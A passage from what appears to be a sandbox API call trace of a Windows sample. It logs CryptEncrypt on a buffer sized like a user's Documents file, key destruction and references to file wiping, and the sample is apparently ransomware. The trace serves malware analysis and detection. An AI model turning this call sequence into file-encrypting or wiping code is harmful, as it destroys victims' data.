(in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.183] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.183] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.183] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.183] CharLowerBuffW (in: lpsz="byte[34929]", cchLength=0xb | out: lpsz="byte[34929]") returned 0xb [0033.183] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.183] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.183] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.184] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.184] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.184] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9460d8*, pdwDataLen=0x6ae220*=0x8860, dwBufLen=0x8870 | out: pbData=0x9460d8*, pdwDataLen=0x6ae220*=0x8870) returned 1 [0033.184] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.184] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.184] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.184] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.184] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.184] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.184] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0033.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.184] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.185] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.185] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.185] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0033.185] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.185] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.185] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.185] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.185] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0033.185] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.187] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.187] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.187] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.188] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.188] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.188] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0033.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.188] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.188] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.188] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0033.188] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.188] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0033.189] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.189] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.189] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.189] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.189] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.189] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.189] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0033.189] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.189] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.189] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0033.189] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0033.189] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.189] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.189] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.189] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.189] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0033.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.189] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.190] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.190] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.190] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.190] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.190] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0033.190] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.190] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.190] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0033.190] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.190] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0033.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0033.190] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.190] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.190] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0033.190] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.190] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.190] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.190] FreeLibrary (hLibModule=0x754b0000) returned 1 [0033.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0033.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0033.191] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0033.191] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.191] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.192] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.192] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.192] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.192] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0033.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0033.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.192] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.192] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.192] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x801ce180, ftCreationTime.dwHighDateTime=0x1d5b646, ftLastAccessTime.dwLowDateTime=0x37ff5ba0, ftLastAccessTime.dwHighDateTime=0x1d5c3fa, ftLastWriteTime.dwLowDateTime=0x37ff5ba0, ftLastWriteTime.dwHighDateTime=0x1d5c3fa, nFileSizeHigh=0x0, nFileSizeLow=0x8860, dwReserved0=0x0, dwReserved1=0x777648, cFileName="iZLE.ods", cAlternateFileName="")) returned 0x7c2240 [0033.193] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0033.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.193] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.193] CharLowerBuffW (in: lpsz="byte[34912]", cchLength=0xb | out: lpsz="byte[34912]") returned 0xb [0033.193] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.193] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0033.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.193] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.193] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0033.193] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0033.194] FreeLibrary (hLibModule=0x76b40000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.194] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.194] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.194] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.194] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0033.194] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.194] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.195] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.195] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.195] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.195] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.195] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.195] PeekMessageW (in: lpMsg=0x6ae83c, 